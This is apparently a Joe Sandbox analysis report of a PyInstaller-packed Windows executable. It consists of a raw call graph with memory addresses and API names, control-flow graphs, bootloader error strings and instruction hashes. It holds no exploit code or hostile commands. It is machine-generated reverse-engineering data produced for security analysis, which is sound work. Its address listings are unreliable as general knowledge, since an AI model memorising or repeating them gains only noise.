7ff6404e1bf0 49 API calls 17875->17876 17877 7ff6404e4601 17876->17877 17878 7ff6404e4687 __vcrt_freefls 17877->17878 17895 7ff6404f5de4 17894->17895 17898 7ff6404f52b0 17895->17898 17897 7ff6404f5e14 17897->17859 17899 7ff6404f52f3 17898->17899 17900 7ff6404f52e1 17898->17900 17902 7ff6404f533d 17899->17902 17905 7ff6404f5300 17899->17905 17901 7ff6404f43f4 _get_daylight 11 API calls 17900->17901 17904 7ff6404f52e6 17901->17904 17903 7ff6404f5358 17902->17903 17906 7ff6404f3ae0 45 API calls 17902->17906 17912 7ff6404f537a 17903->17912 17919 7ff6404f5d3c 17903->17919 17908 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17904->17908 17909 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 17905->17909 17906->17903 17910 7ff6404f52f1 17908->17910 17909->17910 17910->17897 17911 7ff6404f541b 17911->17910 17914 7ff6404f43f4 _get_daylight 11 API calls 17911->17914 17912->17911 17913 7ff6404f43f4 _get_daylight 11 API calls 17912->17913 17915 7ff6404f5410 17913->17915 17916 7ff6404f54c6 17914->17916 17917 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17915->17917 17918 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17916->17918 17917->17911 17918->17910 17920 7ff6404f5d5f 17919->17920 17922 7ff6404f5d76 17919->17922 17925 7ff6404ff278 17920->17925 17923 7ff6404f5d64 17922->17923 17930 7ff6404ff2a8 17922->17930 17923->17903 17926 7ff6404fa460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17925->17926 17927 7ff6404ff281 17926->17927 17928 7ff6404fcc94 45 API calls 17927->17928 17929 7ff6404ff29a 17928->17929 17929->17923 17931 7ff6404f4178 45 API calls 17930->17931 17932 7ff6404ff2e1 17931->17932 17935 7ff6404ff2ed 17932->17935 17937 7ff640502150 17932->17937 17934 7ff6404eb870 _log10_special 8 API calls 17936 7ff6404ff397 17934->17936 17935->17934 17936->17923 17938 7ff6404f4178 45 API calls 17937->17938 17939 7ff640502192 17938->17939 17940 7ff6404febb0 _fread_nolock MultiByteToWideChar 17939->17940 17942 7ff6405021c8 17940->17942 17941 7ff6405021cf 17945 7ff6404eb870 _log10_special 8 API calls 17941->17945 17942->17941 17943 7ff64050228c 17942->17943 17944 7ff6404fc90c _fread_nolock 12 API calls 17942->17944 17948 7ff6405021f8 memcpy_s 17942->17948 17943->17941 17947 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17943->17947 17944->17948 17946 7ff6405022c5 17945->17946 17946->17935 17947->17941 17948->17943 17949 7ff6404febb0 _fread_nolock MultiByteToWideChar 17948->17949 17950 7ff64050226e 17949->17950 17950->17943 17953 7ff6404e86b0 2 API calls 17952->17953 17954 7ff6404e4325 __vcrt_freefls 17953->17954 17954->17873 17974->17463 17976 7ff6404f7555 17975->17976 17977 7ff6404f7568 17975->17977 17979 7ff6404f43f4 _get_daylight 11 API calls 17976->17979 17985 7ff6404f71cc 17977->17985 17981 7ff6404f755a 17979->17981 17983 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17981->17983 17982 7ff6404f7566 17982->17469 17983->17982 17992 7ff6404ff5e8 EnterCriticalSection 17985->17992 17994 7ff6404f6c08 17993->17994 17997 7ff6404f66e4 17994->17997 17996 7ff6404f6c21 17996->17477 17998 7ff6404f672e 17997->17998 17999 7ff6404f66ff 17997->17999 18007 7ff6404f477c EnterCriticalSection 17998->18007 18001 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 17999->18001 18006 7ff6404f671f 18001->18006 18006->17996 18009 7ff6404e7c13 __vcrt_freefls 18008->18009 18010 7ff6404e7b91 GetTokenInformation 18008->18010 18012 7ff6404e7c2c 18009->18012 18013 7ff6404e7c26 CloseHandle 18009->18013 18011 7ff6404e7bb2 GetLastError 18010->18011 18014 7ff6404e7bbd 18010->18014 18011->18009 18011->18014 18012->17483 18013->18012 18014->18009 18015 7ff6404e7bd9 GetTokenInformation 18014->18015 18015->18009 18016 7ff6404e7bfc 18015->18016 18016->18009 18017 7ff6404e7c06 ConvertSidToStringSidW 18016->18017 18017->18009 18019 7ff6404e297a 18018->18019 18020 7ff6404f3ef8 48 API calls 18019->18020 18021 7ff6404e29a2 MessageBoxW 18020->18021 18022 7ff6404eb870 _log10_special 8 API calls 18021->18022 18023 7ff6404e29cc 18022->18023 18023->17494 18025 7ff6404e77dc 18024->18025 18026 7ff6404e86b0 2 API calls 18025->18026 18027 7ff6404e77fb 18026->18027 18028 7ff6404e7803 18027->18028 18029 7ff6404e7816 ExpandEnvironmentStringsW 18027->18029 18030 7ff6404e26c0 49 API calls 18028->18030 18031 7ff6404e783c __vcrt_freefls 18029->18031 18032 7ff6404e780f __vcrt_freefls 18030->18032 18033 7ff6404e7853 18031->18033 18034 7ff6404e7840 18031->18034 18036 7ff6404eb870 _log10_special 8 API calls 18032->18036 18038 7ff6404e78bf 18033->18038 18039 7ff6404e7861 GetDriveTypeW 18033->18039 18035 7ff6404e26c0 49 API calls 18034->18035 18035->18032 18037 7ff6404e79a7 18036->18037 18037->17506 18037->17509 18059 7ff6404f7118 18038->18059 18042 7ff6404e7895 18039->18042 18043 7ff6404e78b0 18039->18043 18045 7ff6404e26c0 49 API calls 18042->18045 18046 7ff6404f6c7c 37 API calls 18043->18046 18045->18032 18046->18032 18151 7ff6404f7aac 18056->18151 18060 7ff6404f7134 18059->18060 18061 7ff6404f71a2 18059->18061 18060->18061 18063 7ff6404f7139 18060->18063 18096 7ff6404ffad0 18061->18096 18064 7ff6404f7151 18063->18064 18065 7ff6404f716e 18063->18065 18071 7ff6404f6ee8 GetFullPathNameW 18064->18071 18079 7ff6404f6f5c GetFullPathNameW 18065->18079 18072 7ff6404f6f0e GetLastError 18071->18072 18074 7ff6404f6f24 18071->18074 18080 7ff6404f6f8f GetLastError 18079->18080 18084 7ff6404f6fa5 __vcrt_freefls 18079->18084 18081 7ff6404f4368 _fread_nolock 11 API calls 18080->18081 18085 7ff6404f6fa1 18084->18085 18086 7ff6404f6fff GetFullPathNameW 18084->18086 18086->18080 18086->18085 18099 7ff6404ff8e0 18096->18099 18100 7ff6404ff922 18099->18100 18101 7ff6404ff90b 18099->18101 18103 7ff6404ff947 18100->18103 18104 7ff6404ff926 18100->18104 18102 7ff6404f43f4 _get_daylight 11 API calls 18101->18102 18192 7ff640500868 18151->18192 18251 7ff6405005e0 18192->18251 18272 7ff6404ff5e8 EnterCriticalSection 18251->18272 18276 7ff6404e1875 18274->18276 18277 7ff6404e1805 18274->18277 18276->17558 18277->18276 18327 7ff6404f4250 18277->18327 18279 7ff6404e753e 18278->18279 18280 7ff6404e7662 18279->18280 18281 7ff6404e1bf0 49 API calls 18279->18281 18283 7ff6404eb870 _log10_special 8 API calls 18280->18283 18282 7ff6404e75c5 18281->18282 18282->18280 18285 7ff6404e1bf0 49 API calls 18282->18285 18286 7ff6404e3f10 10 API calls 18282->18286 18287 7ff6404e86b0 2 API calls 18282->18287 18284 7ff6404e7693 18283->18284 18284->17558 18285->18282 18286->18282 18288 7ff6404e7633 CreateDirectoryW 18287->18288 18288->18280 18288->18282 18290 7ff6404e15d3 18289->18290 18291 7ff6404e15f7 18289->18291 18342 7ff6404e1050 18290->18342 18292 7ff6404e3f70 108 API calls 18291->18292 18294 7ff6404e160b 18292->18294 18295 7ff6404e1613 18294->18295 18296 7ff6404e163b 18294->18296 18299 7ff6404e2760 53 API calls 18295->18299 18300 7ff6404e3f70 108 API calls 18296->18300 18297 7ff6404e15ee 18297->17558 18298 7ff6404e15d8 18298->18297 18301 7ff6404e25f0 53 API calls 18298->18301 18302 7ff6404e162a 18299->18302 18303 7ff6404e164f 18300->18303 18301->18297 18302->17558 18304 7ff6404e1671 18303->18304 18305 7ff6404e1657 18303->18305 18307 7ff6404ef9f4 73 API calls 18304->18307 18306 7ff6404e25f0 53 API calls 18305->18306 18308 7ff6404e1667 18306->18308 18309 7ff6404e1686 18307->18309 18313 7ff6404ef36c 74 API calls 18308->18313 18310 7ff6404e16ab 18309->18310 18311 7ff6404e168a 18309->18311 18314 7ff6404e16b1 18310->18314 18315 7ff6404e16c9 18310->18315 18312 7ff6404e2760 53 API calls 18311->18312 18321 7ff6404e16a1 __vcrt_freefls 18312->18321 18316 7ff6404e17cd 18313->18316 18317 7ff6404e11f0 92 API calls 18314->18317 18319 7ff6404e16eb 18315->18319 18325 7ff6404e170c 18315->18325 18316->17558 18317->18321 18318 7ff6404ef36c 74 API calls 18318->18308 18320 7ff6404e2760 53 API calls 18319->18320 18320->18321 18321->18318 18322 7ff6404ef6bc _fread_nolock 53 API calls 18322->18325 18323 7ff6404e1775 18326 7ff6404e2760 53 API calls 18323->18326 18324 7ff6404efdfc 76 API calls 18324->18325 18325->18321 18325->18322 18325->18323 18325->18324 18326->18321 18328 7ff6404f428a 18327->18328 18329 7ff6404f425d 18327->18329 18331 7ff6404f42ad 18328->18331 18334 7ff6404f42c9 18328->18334 18330 7ff6404f43f4 _get_daylight 11 API calls 18329->18330 18339 7ff6404f4214 18329->18339 18332 7ff6404f4267 18330->18332 18333 7ff6404f43f4 _get_daylight 11 API calls 18331->18333 18336 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18332->18336 18337 7ff6404f42b2 18333->18337 18335 7ff6404f4178 45 API calls 18334->18335 18341 7ff6404f42bd 18335->18341 18338 7ff6404f4272 18336->18338 18340 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18337->18340 18338->18277 18339->18277 18340->18341 18341->18277 18343 7ff6404e3f70 108 API calls 18342->18343 18344 7ff6404e108b 18343->18344 18345 7ff6404e1093 18344->18345 18346 7ff6404e10a8 18344->18346 18347 7ff6404e25f0 53 API calls 18345->18347 18348 7ff6404ef9f4 73 API calls 18346->18348 18353 7ff6404e10a3 __vcrt_freefls 18347->18353 18349 7ff6404e10bd 18348->18349 18350 7ff6404e10c1 18349->18350 18351 7ff6404e10dd 18349->18351 18352 7ff6404e2760 53 API calls 18350->18352 18354 7ff6404e110d 18351->18354 18355 7ff6404e10ed 18351->18355 18361 7ff6404e10d8 __vcrt_freefls 18352->18361 18353->18298 18358 7ff6404e1113 18354->18358 18364 7ff6404e1126 18354->18364 18356 7ff6404e2760 53 API calls 18355->18356 18356->18361 18357 7ff6404ef36c 74 API calls 18359 7ff6404e1194 18357->18359 18360 7ff6404e11f0 92 API calls 18358->18360 18359->18353 18367 7ff6404e40a0 18359->18367 18360->18361 18361->18357 18363 7ff6404ef6bc _fread_nolock 53 API calls 18363->18364 18364->18361 18364->18363 18365 7ff6404e11cc 18364->18365 18366 7ff6404e2760 53 API calls 18365->18366 18366->18361 18368 7ff6404e40b0 18367->18368 18369 7ff6404e86b0 2 API calls 18368->18369 18370 7ff6404e40db 18369->18370 18371 7ff6404e86b0 2 API calls 18370->18371 18377 7ff6404e414e 18370->18377 18373 7ff6404e40f6 18371->18373 18372 7ff6404eb870 _log10_special 8 API calls 18375 7ff6404e4169 18372->18375 18374 7ff6404e40fb CreateSymbolicLinkW 18373->18374 18373->18377 18376 7ff6404e4125 18374->18376 18374->18377 18375->18353 18376->18377 18378 7ff6404e412e GetLastError 18376->18378 18377->18372 18378->18377 18379 7ff6404e4139 18378->18379 18380 7ff6404e40a0 10 API calls 18379->18380 18380->18377 18382 7ff6404e6ef3 GetProcAddress 18381->18382 18383 7ff6404e6ec9 18381->18383 18382->18383 18384 7ff6404e6f18 GetProcAddress 18382->18384 18385 7ff6404e29e0 51 API calls 18383->18385 18384->18383 18386 7ff6404e6f3d GetProcAddress 18384->18386 18387 7ff6404e6ee3 18385->18387 18386->18383 18388 7ff6404e6f65 GetProcAddress 18386->18388 18387->17584 18388->18383 18389 7ff6404e6f8d GetProcAddress 18388->18389 18389->18383 18390 7ff6404e6fb5 GetProcAddress 18389->18390 18391 7ff6404e6fd1 18390->18391 18392 7ff6404e6fdd GetProcAddress 18390->18392 18391->18392 18393 7ff6404e7005 GetProcAddress 18392->18393 18394 7ff6404e6ff9 18392->18394 18395 7ff6404e7021 18393->18395 18396 7ff6404e702d GetProcAddress 18393->18396 18394->18393 18395->18396 18397 7ff6404e7055 GetProcAddress 18396->18397 18398 7ff6404e7049 18396->18398 18399 7ff6404e7071 18397->18399 18400 7ff6404e707d GetProcAddress 18397->18400 18398->18397 18399->18400 18401 7ff6404e70a5 GetProcAddress 18400->18401 18402 7ff6404e7099 18400->18402 18403 7ff6404e70c1 18401->18403 18404 7ff6404e70cd GetProcAddress 18401->18404 18402->18401 18403->18404 18405 7ff6404e70f5 GetProcAddress 18404->18405 18406 7ff6404e70e9 18404->18406 18407 7ff6404e7111 18405->18407 18408 7ff6404e711d GetProcAddress 18405->18408 18406->18405 18407->18408 18409 7ff6404e7145 GetProcAddress 18408->18409 18410 7ff6404e7139 18408->18410 18411 7ff6404e7161 18409->18411 18412 7ff6404e716d GetProcAddress 18409->18412 18410->18409 18411->18412 18413 7ff6404e7195 GetProcAddress 18412->18413 18414 7ff6404e7189 18412->18414 18415 7ff6404e71b1 18413->18415 18416 7ff6404e71bd GetProcAddress 18413->18416 18414->18413 18415->18416 18417 7ff6404e71e5 GetProcAddress 18416->18417 18418 7ff6404e71d9 18416->18418 18419 7ff6404e7201 18417->18419 18420 7ff6404e720d GetProcAddress 18417->18420 18418->18417 18419->18420 18444->17604 18445->17606 18447 7ff6404e694b 18446->18447 18449 7ff6404e6904 18446->18449 18447->17621 18448 7ff6404f4250 45 API calls 18448->18449 18449->18447 18449->18448 18451 7ff6404e3b51 18450->18451 18452 7ff6404e3e90 49 API calls 18451->18452 18453 7ff6404e3b8b 18452->18453 18454 7ff6404e3e90 49 API calls 18453->18454 18455 7ff6404e3b9b 18454->18455 18456 7ff6404e3bbd 18455->18456 18457 7ff6404e3bec 18455->18457 18497 7ff6404e3ac0 18456->18497 18459 7ff6404e3ac0 51 API calls 18457->18459 18460 7ff6404e3bea 18459->18460 18461 7ff6404e3c4c 18460->18461 18462 7ff6404e3c17 18460->18462 18463 7ff6404e3ac0 51 API calls 18461->18463 18504 7ff6404e7400 18462->18504 18465 7ff6404e3c70 18463->18465 18469 7ff6404e3ac0 51 API calls 18465->18469 18479 7ff6404e3cc2 18465->18479 18467 7ff6404e3c47 18471 7ff6404eb870 _log10_special 8 API calls 18467->18471 18468 7ff6404e25f0 53 API calls 18468->18467 18472 7ff6404e3c99 18469->18472 18470 7ff6404e3d43 18473 7ff6404e18f0 115 API calls 18470->18473 18474 7ff6404e3de5 18471->18474 18476 7ff6404e3ac0 51 API calls 18472->18476 18472->18479 18475 7ff6404e3d4d 18473->18475 18474->17621 18477 7ff6404e3dae 18475->18477 18481 7ff6404e3d55 18475->18481 18476->18479 18480 7ff6404e25f0 53 API calls 18477->18480 18478 7ff6404e3d3c 18478->18481 18482 7ff6404e3cc7 18478->18482 18479->18470 18479->18478 18479->18482 18485 7ff6404e3d2b 18479->18485 18480->18482 18483 7ff6404e17e0 45 API calls 18481->18483 18489 7ff6404e25f0 53 API calls 18482->18489 18484 7ff6404e3d67 18483->18484 18486 7ff6404e3d82 18484->18486 18487 7ff6404e3d6c 18484->18487 18488 7ff6404e25f0 53 API calls 18485->18488 18491 7ff6404e15c0 118 API calls 18486->18491 18490 7ff6404e25f0 53 API calls 18487->18490 18488->18482 18489->18467 18490->18467 18492 7ff6404e3d90 18491->18492 18492->18467 18493 7ff6404e25f0 53 API calls 18492->18493 18493->18467 18495 7ff6404e1bf0 49 API calls 18494->18495 18496 7ff6404e3e24 18495->18496 18496->17621 18498 7ff6404e3ae6 18497->18498 18499 7ff6404f3ca4 49 API calls 18498->18499 18500 7ff6404e3b0c 18499->18500 18501 7ff6404e3b1d 18500->18501 18502 7ff6404e3f10 10 API calls 18500->18502 18501->18460 18503 7ff6404e3b2f 18502->18503 18503->18460 18505 7ff6404e7415 18504->18505 18506 7ff6404e3f70 108 API calls 18505->18506 18507 7ff6404e743b 18506->18507 18508 7ff6404e7462 18507->18508 18509 7ff6404e3f70 108 API calls 18507->18509 18511 7ff6404eb870 _log10_special 8 API calls 18508->18511 18510 7ff6404e7452 18509->18510 18513 7ff6404e745d 18510->18513 18514 7ff6404e746c 18510->18514 18512 7ff6404e3c27 18511->18512 18512->18467 18512->18468 18516 7ff6404ef36c 74 API calls 18513->18516 18530 7ff6404ef404 18514->18530 18516->18508 18517 7ff6404e74cf 18518 7ff6404ef36c 74 API calls 18517->18518 18520 7ff6404e74f7 18518->18520 18519 7ff6404ef6bc _fread_nolock 53 API calls 18528 7ff6404e7471 18519->18528 18521 7ff6404ef36c 74 API calls 18520->18521 18521->18508 18522 7ff6404e74d6 18523 7ff6404ef430 37 API calls 18522->18523 18525 7ff6404e74d1 18523->18525 18524 7ff6404efdfc 76 API calls 18524->18528 18525->18517 18536 7ff6404f6628 18525->18536 18526 7ff6404ef430 37 API calls 18526->18528 18528->18517 18528->18519 18528->18522 18528->18524 18528->18525 18528->18526 18529 7ff6404ef404 37 API calls 18528->18529 18529->18528 18531 7ff6404ef41d 18530->18531 18532 7ff6404ef40d 18530->18532 18531->18528 18533 7ff6404f43f4 _get_daylight 11 API calls 18532->18533 18534 7ff6404ef412 18533->18534 18535 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18534->18535 18535->18531 18537 7ff6404f6630 18536->18537 18538 7ff6404f664c 18537->18538 18539 7ff6404f666d 18537->18539 18541 7ff6404f43f4 _get_daylight 11 API calls 18538->18541 18555 7ff6404f477c EnterCriticalSection 18539->18555 18557 7ff6404fa460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18556->18557 18558 7ff6404f96f1 18557->18558 18559 7ff6404f9814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18558->18559 18560 7ff6404f9711 18559->18560

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            Function 00007FF6404E1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 0 7ff6404e1000-7ff6404e3536 call 7ff6404ef138 call 7ff6404ef140 call 7ff6404ebb70 call 7ff6404f4700 call 7ff6404f4794 call 7ff6404e33e0 14 7ff6404e3544-7ff6404e3566 call 7ff6404e18f0 0->14 15 7ff6404e3538-7ff6404e353f 0->15 21 7ff6404e356c-7ff6404e3583 call 7ff6404e1bf0 14->21 22 7ff6404e3736-7ff6404e374c call 7ff6404e3f70 14->22 16 7ff6404e371a-7ff6404e3735 call 7ff6404eb870 15->16 26 7ff6404e3588-7ff6404e35c1 21->26 27 7ff6404e3785-7ff6404e379a call 7ff6404e25f0 22->27 28 7ff6404e374e-7ff6404e377b call 7ff6404e76a0 22->28 29 7ff6404e3653-7ff6404e366d call 7ff6404e7e10 26->29 30 7ff6404e35c7-7ff6404e35cb 26->30 44 7ff6404e3712 27->44 41 7ff6404e379f-7ff6404e37be call 7ff6404e1bf0 28->41 42 7ff6404e377d-7ff6404e3780 call 7ff6404ef36c 28->42 45 7ff6404e3695-7ff6404e369c 29->45 46 7ff6404e366f-7ff6404e3675 29->46 34 7ff6404e35cd-7ff6404e35e5 call 7ff6404f4560 30->34 35 7ff6404e3638-7ff6404e364d call 7ff6404e18e0 30->35 54 7ff6404e35f2-7ff6404e360a call 7ff6404f4560 34->54 55 7ff6404e35e7-7ff6404e35eb 34->55 35->29 35->30 64 7ff6404e37c1-7ff6404e37ca 41->64 42->27 44->16 48 7ff6404e36a2-7ff6404e36c0 call 7ff6404e7e10 call 7ff6404e7f80 45->48 49 7ff6404e3844-7ff6404e3863 call 7ff6404e3e90 45->49 52 7ff6404e3682-7ff6404e3690 call 7ff6404f415c 46->52 53 7ff6404e3677-7ff6404e3680 46->53 78 7ff6404e380f-7ff6404e381e call 7ff6404e8400 48->78 79 7ff6404e36c6-7ff6404e36c9 48->79 69 7ff6404e3865-7ff6404e386f call 7ff6404e3fe0 49->69 70 7ff6404e3871-7ff6404e3882 call 7ff6404e1bf0 49->70 52->45 53->52 66 7ff6404e360c-7ff6404e3610 54->66 67 7ff6404e3617-7ff6404e362f call 7ff6404f4560 54->67 55->54 64->64 65 7ff6404e37cc-7ff6404e37e9 call 7ff6404e18f0 64->65 65->26 82 7ff6404e37ef-7ff6404e3800 call 7ff6404e25f0 65->82 66->67 67->35 83 7ff6404e3631 67->83 81 7ff6404e3887-7ff6404e38a1 call 7ff6404e86b0 69->81 70->81 93 7ff6404e3820 78->93 94 7ff6404e382c-7ff6404e3836 call 7ff6404e7c40 78->94 79->78 84 7ff6404e36cf-7ff6404e36f6 call 7ff6404e1bf0 79->84 95 7ff6404e38a3 81->95 96 7ff6404e38af-7ff6404e38c1 SetDllDirectoryW 81->96 82->44 83->35 99 7ff6404e3805-7ff6404e380d call 7ff6404f415c 84->99 100 7ff6404e36fc-7ff6404e3703 call 7ff6404e25f0 84->100 93->94 94->81 107 7ff6404e3838 94->107 95->96 97 7ff6404e38c3-7ff6404e38ca 96->97 98 7ff6404e38d0-7ff6404e38ec call 7ff6404e6560 call 7ff6404e6b00 96->98 97->98 103 7ff6404e3a50-7ff6404e3a58 97->103 118 7ff6404e38ee-7ff6404e38f4 98->118 119 7ff6404e3947-7ff6404e394a call 7ff6404e6510 98->119 99->81 110 7ff6404e3708-7ff6404e370a 100->110 111 7ff6404e3a5a-7ff6404e3a77 PostMessageW GetMessageW 103->111 112 7ff6404e3a7d-7ff6404e3a92 call 7ff6404e33d0 call 7ff6404e3080 call 7ff6404e33a0 103->112 107->49 110->44 111->112 128 7ff6404e3a97-7ff6404e3aaf call 7ff6404e6780 call 7ff6404e6510 112->128 121 7ff6404e390e-7ff6404e3918 call 7ff6404e6970 118->121 122 7ff6404e38f6-7ff6404e3903 call 7ff6404e65a0 118->122 126 7ff6404e394f-7ff6404e3956 119->126 135 7ff6404e3923-7ff6404e3931 call 7ff6404e6cd0 121->135 136 7ff6404e391a-7ff6404e3921 121->136 122->121 133 7ff6404e3905-7ff6404e390c 122->133 126->103 130 7ff6404e395c-7ff6404e3966 call 7ff6404e30e0 126->130 130->110 144 7ff6404e396c-7ff6404e3980 call 7ff6404e83e0 130->144 137 7ff6404e393a-7ff6404e3942 call 7ff6404e2870 call 7ff6404e6780 133->137 135->126 145 7ff6404e3933 135->145 136->137 137->119 151 7ff6404e3982-7ff6404e399f PostMessageW GetMessageW 144->151 152 7ff6404e39a5-7ff6404e39e8 call 7ff6404e7f20 call 7ff6404e7fc0 call 7ff6404e6780 call 7ff6404e6510 call 7ff6404e7ec0 144->152 145->137 151->152 163 7ff6404e39ea-7ff6404e3a00 call 7ff6404e81f0 call 7ff6404e7ec0 152->163 164 7ff6404e3a3d-7ff6404e3a4b call 7ff6404e18a0 152->164 163->164 171 7ff6404e3a02-7ff6404e3a10 163->171 164->110 172 7ff6404e3a12-7ff6404e3a2c call 7ff6404e25f0 call 7ff6404e18a0 171->172 173 7ff6404e3a31-7ff6404e3a38 call 7ff6404e2870 171->173 172->110 173->164
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileModuleName
                                                                                                                                                                                                                                                            • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                            • API String ID: 514040917-585287483
                                                                                                                                                                                                                                                            • Opcode ID: 2a3628e5ef8489efe408e1403b5f8cd9dc2db04713c58d7f66d9dac8dcced320
                                                                                                                                                                                                                                                            • Instruction ID: b41771169caa7e53486d63186ad72cddfcc7f537cb3ea71f10036f4f1d67ffa6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a3628e5ef8489efe408e1403b5f8cd9dc2db04713c58d7f66d9dac8dcced320
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF17B61A0C6A2F1FA1AFB21D5582FD62A1EF95784F844032DA5DC37D6EF2CE558C380
                                                                                                                                                                                                                                                            Function 00007FF640505C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 359 7ff640505c74-7ff640505ce7 call 7ff6405059a8 362 7ff640505d01-7ff640505d0b call 7ff6404f7830 359->362 363 7ff640505ce9-7ff640505cf2 call 7ff6404f43d4 359->363 368 7ff640505d0d-7ff640505d24 call 7ff6404f43d4 call 7ff6404f43f4 362->368 369 7ff640505d26-7ff640505d8f CreateFileW 362->369 370 7ff640505cf5-7ff640505cfc call 7ff6404f43f4 363->370 368->370 373 7ff640505d91-7ff640505d97 369->373 374 7ff640505e0c-7ff640505e17 GetFileType 369->374 381 7ff640506042-7ff640506062 370->381 379 7ff640505dd9-7ff640505e07 GetLastError call 7ff6404f4368 373->379 380 7ff640505d99-7ff640505d9d 373->380 376 7ff640505e6a-7ff640505e71 374->376 377 7ff640505e19-7ff640505e54 GetLastError call 7ff6404f4368 CloseHandle 374->377 384 7ff640505e73-7ff640505e77 376->384 385 7ff640505e79-7ff640505e7c 376->385 377->370 393 7ff640505e5a-7ff640505e65 call 7ff6404f43f4 377->393 379->370 380->379 386 7ff640505d9f-7ff640505dd7 CreateFileW 380->386 391 7ff640505e82-7ff640505ed7 call 7ff6404f7748 384->391 385->391 392 7ff640505e7e 385->392 386->374 386->379 398 7ff640505ed9-7ff640505ee5 call 7ff640505bb0 391->398 399 7ff640505ef6-7ff640505f27 call 7ff640505728 391->399 392->391 393->370 398->399 404 7ff640505ee7 398->404 405 7ff640505f2d-7ff640505f6f 399->405 406 7ff640505f29-7ff640505f2b 399->406 407 7ff640505ee9-7ff640505ef1 call 7ff6404f9dd0 404->407 408 7ff640505f91-7ff640505f9c 405->408 409 7ff640505f71-7ff640505f75 405->409 406->407 407->381 412 7ff640505fa2-7ff640505fa6 408->412 413 7ff640506040 408->413 409->408 411 7ff640505f77-7ff640505f8c 409->411 411->408 412->413 415 7ff640505fac-7ff640505ff1 CloseHandle CreateFileW 412->415 413->381 416 7ff640505ff3-7ff640506021 GetLastError call 7ff6404f4368 call 7ff6404f7970 415->416 417 7ff640506026-7ff64050603b 415->417 416->417 417->413
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                                                                            • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
